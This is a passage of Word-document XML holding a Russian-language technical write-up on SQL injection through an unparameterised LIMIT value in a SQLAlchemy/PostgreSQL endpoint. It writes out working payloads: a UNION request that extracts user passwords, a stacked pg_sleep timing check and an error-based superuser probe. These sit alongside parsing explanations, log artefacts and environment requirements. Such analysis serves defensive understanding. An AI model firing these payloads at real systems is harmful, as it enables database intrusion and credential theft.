      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), и подставляет напрямую в SQL. SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отправляет это как простую SQL-строку — параметризации нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D54FDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — три варианта в зависимости от драйвера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63650C46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — UNION-канал (любой драйвер, single-statement):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3694CE78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles?limit=10%20UNION%20SELECT%20id,password,now()%20FROM%20users--&amp;offset=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1A0CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">После URL-decode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>limit = "10 UNION SELECT id,password,now() FROM users--"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер получает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042655C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, published_at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E375D8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0CD00C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9656CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY published_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C7C17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT 10 UNION SELECT id,password,now() FROM users-- OFFSET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59817018" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL парсит это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ... LIMIT 10) UNION (SELECT id,password,now() FROM users)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UNION с привязкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к первому SELECT. Ответ HTTP-200 содержит rows из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>articles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + rows из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с паролями в поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>. Связь с 3.1: основной канал извлечения для этого payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B63E94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — stacked queries (только в драйверах с simple protocol — psycopg без params, pgjdbc `preferQueryMode=simple`, node-postgres `client.query(sql)` без values; см. 3.5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BA941" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles?limit=10;%20SELECT%20pg_sleep(5)--&amp;offset=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8F542" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>limit = "10; SELECT pg_sleep(5)--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (в simple-mode):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F15CC3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Сообщение Query ('Q')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248B274" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Содержит две команды через ';':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2B667" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, published_at FROM articles WHERE status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C51FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ORDER BY published_at DESC LIMIT 10; SELECT pg_sleep(5)-- OFFSET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1C560" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Парсер разбивает на два statement, оба исполняются. Response задерживается на 5 секунд — time-based confirmation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>В extended-mode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (psycopg/asyncpg с params, asyncpg всегда, pgx default) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер отвечает</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2DE0BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13D661" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parse-стадия отклоняет multi-statement до Execute. Но в показанном уязвимом коде используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text(f"...")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без params — SQLAlchemy идёт через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без bind-параметров, что в psycopg2 переключает на text-mode → stacked проходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A141CBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — boolean error-based (когда LIMIT в WHERE-подзапросе через f-string):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F1571" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles?limit=(SELECT%20CASE%20WHEN%20(SELECT%20rolsuper%20FROM%20pg_roles%20WHERE%20rolname=current_user)%20THEN%201%20ELSE%201/0%20END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12064BEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT (SELECT CASE WHEN ... THEN 1 ELSE 1/0 END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если current_user superuser, возвращается 1 row; иначе ERROR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>division by zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → HTTP 500 с error message в response. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subquery в LIMIT-context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PostgreSQL allows since 8.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B553C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Полное извлечение данных через UNION (Variant A), confirmation injection через pg_sleep (Variant B), boolean-leak через error в LIMIT subquery (Variant C). LIMIT-injection особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не нарушает синтаксис основного запроса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — приложение получает валидный ответ HTTP-200, разработчик в логах ничего подозрительного не видит (нет SQL-ошибки), а данные ушли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6021909F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B61BF3"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зафиксирует UNION-запрос с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT N UNION SELECT ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5AFA3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_duration_statement = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> покажет full query text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003EE283" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   HTTP access-log покажет необычно длинный query-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?limit=10%20UNION...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078478BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL по дизайну принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>, не только integer-literal. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>): *"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ... where count is an integer-valued expression"*. Это означает, что валидно всё:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018802C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LIMIT 10                                  -- literal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9B87E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT (SELECT 10)                         -- subquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527A446" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT (CASE WHEN ... THEN 10 ELSE 5 END)  -- conditional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD60499" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT NULL                                -- equivalent to no limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097B1C1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">И — что критично для inject-сценария — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT 10 UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсится как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ... LIMIT 10) UNION (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что UNION имеет более низкий приоритет, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> со всеми его clause-ами. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>legitimate SQL feature</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (set operations с pagination на каждом sub-select), не bug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F1E5F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С точки зрения protocol: bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> мог бы быть подставлен в LIMIT-position (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но разработчик должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>явно указать `$1` в SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>передать integer-параметр</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если SQL собран через f-string без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметризации физически нет, и сервер видит готовую строку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25100A60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736ACFF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (поведение LIMIT-context документировано с 7.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B89DA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любая роль с EXECUTE-доступом к эндпоинту (для UNION-extraction — также SELECT на целевые таблицы; типично — те же права, что у application-роли).</w:t>
      </w:r>
    </w:p>
